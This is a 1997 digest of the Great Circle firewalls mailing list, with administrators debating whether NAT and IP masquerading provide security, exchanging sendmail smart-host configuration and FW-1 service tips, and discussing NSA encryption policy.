Received: from beast.ntshop.net ([207.91.166.3]) by ns1.ntshop.com (post.office MTA v2.0 0813 ID# 153-13296) with SMTP id AAA91 for ; Fri, 3 Jan 1997 13:24:15 -0600
Received: by beast.ntshop.net with Microsoft Mail id <01BBF979.4FDC0940@beast.ntshop.net>; Fri, 3 Jan 1997 13:23:30 -0600
Message-ID: <01BBF979.4FDC0940@beast.ntshop.net>
From: Mark Joseph Edwards
To: "'firewalls@greatcircle.com'"
Subject: RE: NT NAT
Date: Fri, 3 Jan 1997 13:23:29 -0600
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Russ wrote -
-----------------------
[snip]
You got anything intelligent to say on just why you think NAT offers ANY SECURITY AT ALL??? I can't wait to hear it. I mean ANY SECURITY AT ALL.
Let me say it again so there's no misunderstanding; TELL ME WHAT SECURITY IP FUNNEL (with the features listed) PROVIDES TO A NETWORK EXPOSED TO THE INTERNET WITH NOTHING ELSE BUT A ROUTER BETWEEN THEIR TRUSTED MACHINES AND THE WILD BLUE YONDER AS SHOWN IN THE IP FUNNEL NETWORK DIAGRAM.
[snip]
-----------------------

Russ, my post wasn't about the validity of a NAT for use in security implementations. You missed my point entirely. Let me clarify a bit -- since you're interpreting what you see on their site in your own unique way, you seem to have overlooked one important thing:

THEY HAVE A FIREWALL PRODUCT FOR SALE TOO. DO YOU THINK THEY'D BE SO BLATANT AS TO IMPLY THAT THEIR NAT IS ALL YOU NEED WHEN THEY HAVE A MISSING PIECE OF THE SECURITY PUZZLE FOR SALE ON THE SAME WEB SITE?

The picture you flamed them over is obviously intended by them to show how the product fits into network topology -- not to show how to secure a network entirely.

Now we'll all go through 10,000 posts debating the NAT. Great. I can't wait....
MJE

From firewalls-owner Fri Jan 3 12:48:58 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA18935 for firewalls-outgoing; Fri, 3 Jan 1997 11:38:04 -0800 (PST)
Received: from reflections.mindspring.com (reflections.mindspring.com [204.180.142.192]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id LAA18913 for ; Fri, 3 Jan 1997 11:37:51 -0800 (PST)
Received: from localhost (lists@localhost) by reflections.mindspring.com (8.7.1/8.7.1) with SMTP id OAA01156; Fri, 3 Jan 1997 14:37:09 -0500
Date: Fri, 3 Jan 1997 14:37:09 -0500 (EST)
From: Todd Graham Lewis
To: Russ
cc: Firewalls Mailing List
Subject: RE: NT NAT
In-Reply-To: <41FDA823FC5AD011A0970000E8D5C66771A2@mail.rc.on.ca>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Thu, 2 Jan 1997, Russ wrote:

> Their network diagram describing how the system would be placed has it
> behind a router and in front of the internal LAN. So now someone would
> seem to think that it is highly desirable to dedicate an NT Workstation
> to the task of NAT-only. Me thinks you could probably get a new router
> that supports NAT for less money.

I sincerely agree. A much better choice would have been a 386 running a non-bloated OS w/ IP Masquerade. There was a description of just such a setup in this month's SysAdmin magazine for anyone interested.

__
Todd Graham Lewis                                          Linux!
Core Engineering                                  Mindspring Enterprises
tlewis@mindspring.com                            (800) 719 4664, x2804

From firewalls-owner Fri Jan 3 12:52:40 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA20954 for firewalls-outgoing; Fri, 3 Jan 1997 11:57:24 -0800 (PST)
Received: from kcpgw2.kcp.com (kcpgw2.kcp.com [198.62.69.67]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id LAA20883 for ; Fri, 3 Jan 1997 11:57:01 -0800 (PST)
From: dharris@kcp.com
Message-Id: <199701031957.LAA20883@miles.greatcircle.com>
Received: by kcpgw2.kcp.com id AA15413 (InterLock SMTP Gateway 3.0 for firewalls@GreatCircle.COM); Fri, 3 Jan 1997 13:56:09 -0600
Received: by kcpgw2.kcp.com (Internal Mail Agent-2); Fri, 3 Jan 1997 13:56:09 -0600
Received: by kcpgw2.kcp.com (Internal Mail Agent-1); Fri, 3 Jan 1997 13:56:09 -0600
Mime-Version: 1.0
Date: Fri, 3 Jan 1997 13:46:49 -0600
Subject: Re[2]: NT NAT
To: "'Firewalls Mailing List'" , Carl Karlsson
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Description: cc:Mail note part
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Added security? Only that extra security provided by not having your network's addresses known to the 'net. The NAT provides no extra protection from someone "outside" who knows or deduces (from unparsed E-mail headers, perhaps) your actual addresses. It also provides no activity logging for later audit, at least not as part of the NAT function.

Is it better than nothing? Arguably, yes, because it is an extra layer between your network and the 'net. Is it dangerous? Yes, especially if you think you are protected against attack because you have a NAT.

Oops, I suppose I have just contradicted Russ. I think I just said that a NAT does provide some small measure of security. I guess I would put a NAT somewhere way below a screen router in the hierarchy of "firewalls", but I would definitely include it as part of the arsenal of a scapegoat.
(Q: If the person who runs the web site is the webmaster, the one who runs a postoffice is a postmaster, what is the person who runs the firewall between two networks? A: You call her or him the scapegoat.)

______________________________ Reply Separator _________________________________
Subject: RE: NT NAT
Author: Carl Karlsson at INTERNET-MAIL
Date: 1/3/97 5:43 PM

On Fri, 3 Jan 1997, Russ wrote:

> You got anything intelligent to say on just why you think NAT offers ANY
> SECURITY AT ALL??? I can't wait to hear it. I mean ANY SECURITY AT ALL.

I'd like to know if and why this means that masquerading one's network behind a 'secured' host doesn't provide any added security from just connecting the network straight out? Or am I missing something here (not unusual :)?

I was under the impression that if I use some box (Linux with TIS fwtk for example, or that NT box perhaps?) masquerading my network and using 192.168.x.x addresses inside, I would be at least a little bit more secure than if I had all my w95/nt/unix machines directly connected to the internet?

(Not talking super-secure here, not flaming anyone, but just interested! Pointers do nicely if this is already well-known...)
Calle

From firewalls-owner Fri Jan 3 13:52:30 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA26078 for firewalls-outgoing; Fri, 3 Jan 1997 12:54:10 -0800 (PST)
Received: from vespa.unix-ag.uni-siegen.de (vespa.unix-ag.uni-siegen.de [141.99.208.50]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id MAA26046 for ; Fri, 3 Jan 1997 12:53:41 -0800 (PST)
Received: from privatehost (sfx@isdn34.hrz.uni-siegen.de [141.99.174.34]) by vespa.unix-ag.uni-siegen.de (8.8.4/8.8.4/sfx-3.0) with ESMTP id VAA14243 for ; Fri, 3 Jan 1997 21:51:53 +0100 (MET)
To: "firewalls"
In-Reply-To: <1.5.4.32.19970103091312.00904024@laus.dbk.laus.hr>
From: "Lars Eilebrecht"
Date: Fri, 03 Jan 1997 14:30:03 +0200
X-Mailer: IntuiNews 1.4 (28.6.96)
Subject: Re: sendmail 8.8.4 with firewall
Message-ID: <43789509.sfx@shadowbase.unix-ag.uni-siegen.de>
Organization: Unix workgroup at the University of Siegen
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Mario Misic wrote:

> I am running sendmail-8.8.4 on AIX-3.2.5.
>
> My problem is how to configure sendmail-8.8.4 to send mail over my firewall
> server !
> I configure sendmail.cf like they said in README file but .......... ?

But _how_ have you configured it? What features are turned on? What errors do you get?

If you have a DNS inside your domain which is not directly connected to the outside world, you may use something like this in your .mc file:

    dnl all mail not delivered directly below goes to the firewall host
    define(`SMART_HOST', smtp:your-firewall-host.doma.in)

    dnl hosts the internal DNS can resolve get a trailing dot from
    dnl canonification and are delivered directly; the LHS and RHS of
    dnl the rule must be separated by a tab, not spaces
    LOCAL_NET_CONFIG
    R$* < @ $* . > $*	$#smtp $@ $2. $: $1 < @ $2. > $3

This will forward all mail to hosts inside your domain directly to the host (or its MX), and all other mail will be forwarded to your firewall host as defined by the SMART_HOST option. If you still have problems, try to turn off MX lookups for your firewall host by using 'smtp:[your-firewall-host.doma.in]'.
If you have problems in receiving mail from your firewall system, you may want to open the identd port on your firewall system (for local hosts) or recompile sendmail with 'IDENTPROTO*' turned off in 'conf.h'.

And if all else fails, check your DNS and read the sendmail README again. :)

ciao...
Lars

--
 _____ ____ __
/\___// __// / __       sfx@cyberspace.org
\ \ / /_\ / /\_\        http://www.cyberspace.org/~sfx/
___\ \/ __// \ \/_/
/____\/_/ /_/\ \        - The most useful program will be
\_\                     - continually improved until it is useless.

From firewalls-owner Fri Jan 3 14:07:20 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id NAA00305 for firewalls-outgoing; Fri, 3 Jan 1997 13:43:51 -0800 (PST)
Received: from fileserver.wtwitc.com ([204.238.40.137]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id NAA00270 for ; Fri, 3 Jan 1997 13:43:30 -0800 (PST)
Received: by fileserver.wtwitc.com from localhost (router,SLMAILNT V2.2); Fri, 03 Jan 1997 16:08:18 Eastern Standard Time
Received: by fileserver.wtwitc.com from zdwells (204.238.40.170::mail daemon; unverified,SLMAILNT V2.2); Fri, 03 Jan 1997 16:08:17 Eastern Standard Time
From: "Zachary Wells"
To: "Firewalls"
Subject: Stopping/Starting FW-1
Date: Fri, 3 Jan 1997 16:08:28 -0500
X-MSMail-Priority: Normal
X-Priority: 3
X-Mailer: Microsoft Internet Mail 4.70.1160
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Message-Id: <19970103160818.5c2ae4c9.in@fileserver.wtwitc.com>
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I'm using fw-1 ver 2.1c for NT. I'm looking for the command line to stop and start the firewall. In the docs it refers to a command fwstart and fwstop. Neither of these two commands exists on my server, and fw start and fw stop don't work either. What is the proper command?
--------------------------------------------------------
Zach Wells
Internal Computing
Business: zachw@wtwitc.com
Personal: ZachW@mindspring.com
http://www.wtwitc.com/
Wesson, Taylor, Wells & Associates
------------------
When you want to help people,
you tell them the truth.
When you want to help yourself,
you tell them what they want to hear.
-- Thomas Sowell --
--------------------------------------------------------

From firewalls-owner Fri Jan 3 15:12:20 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA02160 for firewalls-outgoing; Fri, 3 Jan 1997 14:14:22 -0800 (PST)
Received: from hidata.com (hidata.com [205.158.61.34]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id OAA02110 for ; Fri, 3 Jan 1997 14:13:57 -0800 (PST)
Received: by hidata.com; id AA14945; Fri, 3 Jan 97 14:13:20 PST
Received: from oscntsrv.hidata.com(205.158.60.100) by hds-gw.hidata.com via smap (3.2) id xmaa14941; Fri, 3 Jan 97 14:13:06 -0800
Received: by oscntsrv.hidata.com with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63) id <01BBF981.2FDE8430@oscntsrv.hidata.com>; Fri, 3 Jan 1997 14:19:53 -0800
Message-Id:
From: "Stout, Bill"
To: "'Henry W. Farkas'"
Cc: "'Firewall List'"
Subject: RE: Huh? I musta misread this!
Date: Fri, 3 Jan 1997 14:19:51 -0800
X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Friday, January 03, 1997 1:11 PM, Henry W. Farkas[SMTP:hfarkas@ims.advantis.com] wrote:

> You appear to be stating that, in the interests of protecting us against the
> issues you delineate above, we should support government control of: crypto,
> virus protection, log-on authentication and key escrow.

Whoops, that is the _OPPOSITE_ of what I was trying to get across.
As firewallers we believe in the trusted/untrusted network design philosophy, and a government most definitely fits in the untrusted category. Therefore:

o I do not support government control of crypto.
o I do not support government control of virus protection.
o I do not support government control of logon authentication.
o I do not support government control of key escrow.

I actually am grateful for the presence of non-malicious hackers who have exposed (otherwise they'd still be present) security holes.

Verbosity follows (mouth in foot habit):

The competitive culture I left in Los Angeles had a school of thought which went like this: 'Life is a race with the next guy; if there's something you can do to impede him to win, do it'. The culture in Silicon Valley is more like this: 'Life is like climbing a mountain; if people help each other, you can get much further than when alone'.

The NSA's policy on encryption is like the race with the next guy.

If they allowed the private sector to work on encryption, the NSA could reap from the development and add to it for their own security. But then again they are in the spy business and in a way are against security for those they might want to attack.
Bill Stout

From firewalls-owner Fri Jan 3 16:13:59 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id PAA13951 for firewalls-outgoing; Fri, 3 Jan 1997 15:44:36 -0800 (PST)
Received: from pnw.opensys.com (PNW.PNW.OPENSYS.COM [198.202.150.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id PAA13897 for ; Fri, 3 Jan 1997 15:44:08 -0800 (PST)
Received: from medina-qe0.opensys.com (medina.opensys.com [198.202.150.3]) by pnw.opensys.com (8.8.4/8.8.4) with SMTP id PAA15990; Fri, 3 Jan 1997 15:50:11 -0800 (PST)
Received: from pnw2.opensys.com by medina-qe0.opensys.com via smtpd (for pnw.opensys.com [198.202.150.1]) with SMTP; 3 Jan 1997 23:43:55 UT
Received: from unknown (woody [198.202.150.44]) by pnw2.opensys.com (8.8.4/8.8.4) with SMTP id PAA14225; Fri, 3 Jan 1997 15:43:43 -0800 (PST)
Message-ID:
In-Reply-To: <19970103160818.5c2ae4c9.in@fileserver.wtwitc.com>
References: Conversation <19970103160818.5c2ae4c9.in@fileserver.wtwitc.com> with last message <19970103160818.5c2ae4c9.in@fileserver.wtwitc.com>
X-MSMail-Priority: Normal
X-Priority: 3
To: "Zachary Wells" , "Firewalls"
MIME-Version: 1.0
From: "Chris Plunkett"
Subject: Re: Stopping/Starting FW-1
Date: Fri, 03 Jan 97 15:41:19 PST
Content-Type: text/plain; charset="ISO-8859-1"; X-MAPIextension=".TXT"
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

The services applet in the Windows control panel should list the firewall service; simply highlight it and press stop.

----------
> I'm using fw-1 ver 2.1c for NT. I'm looking for the command
> line to stop and start the firewall. In the docs it refers
> to a command fwstart and fwstop. Neither of these two
> commands exist on my server and fw start and fw stop don't
> work either. What is the proper command?
>
> --------------------------------------------------------
> Zach Wells
> Internal Computing
> Business: zachw@wtwitc.com
> Personal: ZachW@mindspring.com
> http://www.wtwitc.com/
> Wesson, Taylor, Wells & Associates
> ------------------
> When you want to help people,
> you tell them the truth.
> When you want to help yourself,
> you tell them what they want to hear.
> -- Thomas Sowell --
> --------------------------------------------------------

From firewalls-owner Fri Jan 3 17:20:19 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA19928 for firewalls-outgoing; Fri, 3 Jan 1997 17:09:24 -0800 (PST)
Received: from tsunami.trouble.org (tsunami.trouble.org [206.14.193.10]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id RAA19894 for ; Fri, 3 Jan 1997 17:09:12 -0800 (PST)
Received: (from zen@localhost) by tsunami.trouble.org (5.3/5.3.2-gamma) id RAA17858 for firewalls@greatcircle.com; Fri, 3 Jan 1997 17:08:15 -0800 (PST)
Message-Id: <199701040108.RAA17858@tsunami.trouble.org>
From: zen@trouble.org (d)
Date: Fri, 3 Jan 1997 17:08:14 -0800
X-Mailer: Mail User's Shell (7.2.5 10/14/92)
To: firewalls@greatcircle.com
Subject: Internet security survey
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I completed an Internet security survey and wrote up a report about the rather appalling results; it can be seen at:

http://www.trouble.org/survey

Comments, critique, etc. welcome -

--
dan farmer

(I got some complaints about people not seeing my announcement the first time around (a couple of weeks ago); please pardon the duplicate notice.)
From firewalls-owner Fri Jan 3 20:49:36 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id UAA29106 for firewalls-outgoing; Fri, 3 Jan 1997 20:36:10 -0800 (PST)
Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id UAA29082 for ; Fri, 3 Jan 1997 20:35:58 -0800 (PST)
Message-Id: <199701040435.UAA29082@miles.greatcircle.com>
Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA057492467; Sat, 4 Jan 1997 15:34:28 +1100
From: Darren Reed
Subject: Re: NT NAT
To: lists@reflections.mindspring.com (Todd Graham Lewis)
Date: Sat, 4 Jan 1997 15:34:27 +1100 (EDT)
Cc: Russ.Cooper@RC.on.ca, firewalls@GreatCircle.COM
In-Reply-To: from "Todd Graham Lewis" at Jan 3, 97 02:37:09 pm
X-Mailer: ELM [version 2.4 PL23]
Content-Type: text
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

In some mail from Todd Graham Lewis, sie said:

> On Thu, 2 Jan 1997, Russ wrote:
>
> > Their network diagram describing how the system would be placed has it
> > behind a router and in front of the internal LAN. So now someone would
> > seem to think that it is highly desirable to dedicate an NT Workstation
> > to the task of NAT-only. Me thinks you could probably get a new router
> > that supports NAT for less money.
>
> I sincerely agree. A much better choice would have been a 386 running a
> non-bloated OS w/ IP Masquerade. There was a description of just such a
> setup in this month's SysAdmin magazine for anyone interested.

IP Masquerading (and Linux is the only place it is called such) is NAT, so your "better choice" really isn't better at all. Whilst you could buy a PIX or some other router which does the same, they are only more secure in the sense that it isn't running a "normal" OS - it is still running IOS (or whatever it must) and that can still be "broken into", so the gain is minimal.

NAT doesn't buy you "security", except for security by obscurity and a little more.
If the NAT product works as they all should, it should _NOT_ be possible to target an internal machine without it having initiated an external communication first. The obscurity: the attacker doesn't have `direct' access to the internal hosts; the bit extra is, if a host inside never requires the NAT, it never has an external IP#. Relying on NAT alone is dangerous, as as long as the mapping exists, the host can be attacked.

Darren

p.s. in case you missed it, IP Masquerading is NOT more secure than NAT.

From firewalls-owner Fri Jan 3 21:29:58 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id VAA01960 for firewalls-outgoing; Fri, 3 Jan 1997 21:24:24 -0800 (PST)
Received: from mail.ka.inka.de (quechua.inka.de [193.197.84.5]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id VAA01952 for ; Fri, 3 Jan 1997 21:24:08 -0800 (PST)
Received: from uu.inka.de ([193.197.84.8]) by mail.ka.inka.de with smtp (ident root using rfc1413) id m0vgOZt-0004FkC (Debian Smail-3.2 1996-Jul-4 #2); Sat, 4 Jan 1997 06:23:29 +0100 (MET)
Received: from lina (lists@lina.inka.de) by uu.inka.de with bsmtp (S3.1.29.1) id ; Sat, 4 Jan 97 06:23 MET
Received: by lina id m0vgNIb-0004ixC (Debian Smail-3.2 1996-Jul-4 #2); Sat, 4 Jan 1997 05:01:33 +0100 (MET)
Message-Id:
From: lists@lina.inka.de (Bernd Eckenfels)
Subject: Re: Re[2]: NT NAT
To: dharris@kcp.com
Date: Sat, 4 Jan 1997 05:01:32 +0100 (MET)
Cc: firewalls@GreatCircle.COM, ckn@findata.se
In-Reply-To: <199701031957.LAA20883@miles.greatcircle.com> from "dharris@kcp.com" at Jan 3, 97 01:46:49 pm
X-Mailer: ELM [version 2.4 PL25 PGP2]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hello,

> Added security? Only that extra security provided by not having your network's
> addresses known to the 'net.
> The NAT provides no extra protection from someone
> "outside" who knows or deduces (from unparsed E-mail headers, perhaps) your
> actual addresses. It also provides no activity logging for later audit, at
> least not as part of the NAT function.

This is not quite true. NAT can protect you from outside because it only allows you to make connections from the inside to the outside. If you use Linux Masquerading for example, there is no way to reach a listening port of the internal network from outside. This is sort of stateful connection filtering.

Greetings
Bernd

--
  (OO)      -- Bernd_Eckenfels@Wittumstrasse13.76646Bruchsal.de --
 ( .. )  ecki@{inka.de,linux.de,debian.org}  http://home.pages.de/~eckes/
  o--o     *plush*  2048/93600EFD  eckes@irc  +4972573817  BE5-RIPE
(O____O)  If privacy is outlawed only Outlaws have privacy

From firewalls-owner Sat Jan 4 00:59:01 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id AAA11236 for firewalls-outgoing; Sat, 4 Jan 1997 00:41:25 -0800 (PST)
Received: from mail.swip.net (mail.swip.net [192.71.180.65]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id AAA11229 for ; Sat, 4 Jan 1997 00:41:15 -0800 (PST)
Received: from wintermute.marievik.findata.se by mail.swip.net (8.6.8/3.01) id JAA18973; Sat, 4 Jan 1997 09:40:51 +0100
Received: from wintermute.marievik.findata.se (ckn@wintermute.marievik.findata.se [192.71.39.5]) by wintermute.marievik.findata.se (8.6.4/8.6.4) with SMTP id JAA17326 for ; Sat, 4 Jan 1997 09:40:47 +0100
Date: Sat, 4 Jan 1997 09:40:46 +0100 (MET)
From: Carl Karlsson
X-Sender: ckn@wintermute.marievik.findata.se
To: "'Firewalls Mailing List'"
Subject: Re: Re[2]: NT NAT
In-Reply-To: <199701031957.LAA20883@miles.greatcircle.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Fri, 3 Jan 1997 dharris@kcp.com wrote:

> Added security?
> Only that extra security provided by not having your network's
> addresses known to the 'net. The NAT provides no extra protection from someone
> "outside" who knows or deduces (from unparsed E-mail headers, perhaps) your
> actual addresses. It also provides no activity logging for later audit, at
> least not as part of the NAT function.

Please correct me if I'm wrong here, but I was under the impression that the 192.168.x.x addresses were 'non-routable' or whatever the term is. Under what circumstances can an external intruder gain access to my internal 192.168.x.x machines?

I'm not arguing that NAT is a great firewall; I'm just trying to understand what the risks are with masquerading 'illegal' addresses behind a machine that is 'secure enough'. And, sorry, just saying it's useless without any argument just isn't enough. :)

Calle

From firewalls-owner Sat Jan 4 08:01:56 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA20232 for firewalls-outgoing; Sat, 4 Jan 1997 07:44:35 -0800 (PST)
Received: from mail.baileynm.com (fw.baileynm.com [206.109.159.11]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id HAA20225 for ; Sat, 4 Jan 1997 07:44:25 -0800 (PST)
Received: (qmail 12910 invoked from smtpd); 4 Jan 1997 15:44:01 -0000
Received: from web.nmti.com (root@198.178.0.201) by fw.nmti.com with SMTP; 4 Jan 1997 15:44:01 -0000
Received: from sonic.nmti.com (peter@sonic.nmti.com [198.178.0.2]) by web.nmti.com (8.6.12/8.6.9) with SMTP id JAA19436; Sat, 4 Jan 1997 09:44:00 -0600
Received: by sonic.nmti.com; id AA00908; Sat, 4 Jan 1997 09:43:55 -0600
From: peter@baileynm.com (Peter da Silva)
Message-Id: <9701041543.AA00908@sonic.nmti.com.nmti.com>
Subject: Re: Re[2]: NT NAT
To: ckn@findata.se (Carl Karlsson)
Date: Sat, 4 Jan 1997 09:43:54 -0600 (CST)
Cc: firewalls@GreatCircle.COM
In-Reply-To: from "Carl Karlsson" at Jan 4, 97 09:40:46 am
X-Mailer: ELM [version 2.4 PL23]
Content-Type: text
Sender:
firewalls-owner@GreatCircle.COM
Precedence: bulk

> Please correct me if I'm wrong here but I was under the impression that
> the 192.168.x.x-addresses was 'non-routable' or whatever the term is.
> Under what circumstances can an external intruder gain access to my
> internal 192.168.x.x-machines?

Source routed packets.

From firewalls-owner Sat Jan 4 08:29:16 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA21385 for firewalls-outgoing; Sat, 4 Jan 1997 08:21:32 -0800 (PST)
Received: from lint.cisco.com (lint.cisco.com [171.68.223.44]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id IAA21359 for ; Sat, 4 Jan 1997 08:21:20 -0800 (PST)
Received: from big-dogs.cisco.com ([171.68.53.75]) by lint.cisco.com (8.8.4/CISCO.SERVER.1.2) with SMTP id IAA20830; Sat, 4 Jan 1997 08:19:48 -0800 (PST)
Message-Id: <3.0.32.19970104111733.006caf34@lint.cisco.com>
X-Sender: pferguso@lint.cisco.com
X-Mailer: Windows Eudora Pro Version 3.0 (32)
Date: Sat, 04 Jan 1997 11:17:37 -0500
To: peter@baileynm.com (Peter da Silva)
From: Paul Ferguson
Subject: Re: Re[2]: NT NAT
Cc: ckn@findata.se (Carl Karlsson), firewalls@GreatCircle.COM
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

At 09:43 AM 1/4/97 -0600, Peter da Silva wrote:

>> Please correct me if I'm wrong here but I was under the impression that
>> the 192.168.x.x-addresses was 'non-routable' or whatever the term is.
>> Under what circumstances can an external intruder gain access to my
>> internal 192.168.x.x-machines?
>
>Source routed packets.
>

Which are easily stopped.

- paul

--
Paul Ferguson                         ||        ||
Consulting Engineering                ||        ||
Herndon, Virginia USA                ||||      ||||
tel: +1.703.397.5938             ..:||||||:..:||||||:..
e-mail: pferguso@cisco.com       c i s c o  S y s t e m s

From firewalls-owner Sat Jan 4 11:30:11 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA27275 for firewalls-outgoing; Sat, 4 Jan 1997 11:21:21 -0800 (PST)
Received: from hotstar.net (hotstar.net [204.191.136.8]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id LAA27268 for ; Sat, 4 Jan 1997 11:21:11 -0800 (PST)
Received: from istar.ca (istar.ca [204.191.136.4]) by hotstar.net (8.7.3/8.7) with ESMTP id OAA17838; Sat, 4 Jan 1997 14:22:56 -0500 (EST)
Received: from ts56-08.tor.iSTAR.ca (ts56-08.tor.iSTAR.ca [204.191.142.108]) by istar.ca (8.8.4/8.8.4) with SMTP id OAA11275; Sat, 4 Jan 1997 14:20:46 -0500 (EST)
Received: by ts56-08.tor.iSTAR.ca with Microsoft Mail id <01BBFA4A.7180A200@ts56-08.tor.iSTAR.ca>; Sat, 4 Jan 1997 14:20:32 -0500
Message-ID: <01BBFA4A.7180A200@ts56-08.tor.iSTAR.ca>
From: Gene Lee
To: "'Henry W. Farkas'" , "'Stout, Bill'"
Cc: "'Firewall List'"
Subject: RE: Huh? I musta misread this!
Date: Sat, 4 Jan 1997 14:20:30 -0500
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Friday, January 03, 1997 5:19 PM, Stout, Bill[SMTP:bill.stout@hidata.com] wrote:

>The competitive culture I left in Los Angeles had a school of
>thought which went like this: 'Life is a race with the next guy,
>if there's something you can do to impede him to win, do it'.
>The culture in Silicon Valley is more like this: 'Life is like
>climbing a mountain, if people help each other, you can get much
>further than when alone'.
>
>NSA's policy on encryption is like the race with the next guy.
>
>If they allowed the private sector to work on encryption, the NSA
>could reap from the development and add to it for their own security.
>But then again they are in the Spy business and in a way are against
>security for those they might want to attack.
That and the fact that it's generally thought that the NSA is light-years ahead of any other agency/organization in encryption technology. No one can help them get further up the mountain, so they are simply interested in keeping everyone else as far down the mountain as possible...

--
Gene Lee
genel@inforamp.net
genelee@vnet.ibm.com

From firewalls-owner Sat Jan 4 16:29:01 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id QAA08204 for firewalls-outgoing; Sat, 4 Jan 1997 16:17:14 -0800 (PST) Received: from mail.swip.net (mail.swip.net [192.71.180.65]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id QAA08197 for ; Sat, 4 Jan 1997 16:17:07 -0800 (PST) Received: from wintermute.marievik.findata.se by mail.swip.net (8.6.8/3.01) id BAA07400; Sun, 5 Jan 1997 01:16:36 +0100 Received: from wintermute.marievik.findata.se (ckn@wintermute.marievik.findata.se [192.71.39.5]) by wintermute.marievik.findata.se (8.6.4/8.6.4) with SMTP id BAA22991 for ; Sun, 5 Jan 1997 01:16:34 +0100 Date: Sun, 5 Jan 1997 01:16:33 +0100 (MET) From: Carl Karlsson X-Sender: ckn@wintermute.marievik.findata.se Reply-To: Carl Karlsson To: firewalls@GreatCircle.COM Subject: Re: Re[2]: NT NAT In-Reply-To: <3.0.32.19970104111733.006caf34@lint.cisco.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

On Sat, 4 Jan 1997, Paul Ferguson wrote:
> At 09:43 AM 1/4/97 -0600, Peter da Silva wrote:
> >> Please correct me if I'm wrong here but I was under the impression that
> >> the 192.168.x.x-addresses were 'non-routable' or whatever the term is.
> >> Under what circumstances can an external intruder gain access to my
> >> internal 192.168.x.x-machines?
> >
> >Source routed packets.
>
> Which are easily stopped.

You guys have a cool terse way of discussing interesting things. :) I was thinking that source routed packets were the answer to my question, and I was also believing that they could be stopped. Do I need to care about source routed packets if my upstream provider has everything configured as they should? If I am using, for example, Linux, would it be enough to configure the Linux kernel to drop source routed packets? To configure the Linux firewall to ignore localnet packets from the external link?

Many questions.. I'll accept an RTFM answer if someone also tells me what TFM is. :)

Calle

